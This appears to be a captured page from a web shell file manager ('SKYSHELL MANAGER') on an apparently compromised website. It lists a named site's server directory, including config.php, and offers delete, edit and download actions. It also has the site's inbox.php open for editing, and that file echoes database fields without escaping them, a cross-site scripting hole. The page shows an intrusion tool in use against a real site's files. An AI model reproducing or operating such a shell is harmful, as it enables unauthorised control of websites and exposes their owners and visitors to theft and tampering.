📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
boot
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📁
css
-
0755
🗑️
🔒
📁
js
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
112.51 KB
0644
🗑️
⬇️
✏️
🔒
Editing: inbox.php
<?php // session_start(); ?><?php include "header2.php"; ?><?php include "every.php"; ?> <body onLoad="getLocation()"> <style> .guy{ background-color:#FFFFFF; color:#000000; padding:20px; margin:40px; } </style> <main id="main"> <!-- =======rack and Book Section ======= --> <section id="about" class="about" style="margin-bottom:100px;" > <div class="container" data-aos="fade-up"> <div class="row content"> <?php include "connect_to_mysqli.php"; $sql = "SELECT all *from box ORDER BY id DESC LIMIT 10 "; $sql2 = mysqli_query($con,$sql); while($row = mysqli_fetch_array($sql2)) { echo' <div class="col-lg-12 guy" style="padding:20px; width:100%; margin:auto;"> <p ><h4 style="color:#FF339A;"> '.$row["tite"].' </h4> <p style=" font-size:12px;"> '.$row["mess"].' </p> <p style=" font-size:12px;" ><i>'.$row["dear"].'</i></p> <p><form method="post" action="read.php"><input type="text" class="form-control" value="'.$row["id"].'" name="idea" required hidden ><button type="submit" class="submitn"> Read More</button></form> </div>'; } ?> </div></div> </section><!-- Book Section --> </main><!-- End #main --> <?php include "footer2.php"; ?>
💾 Save Changes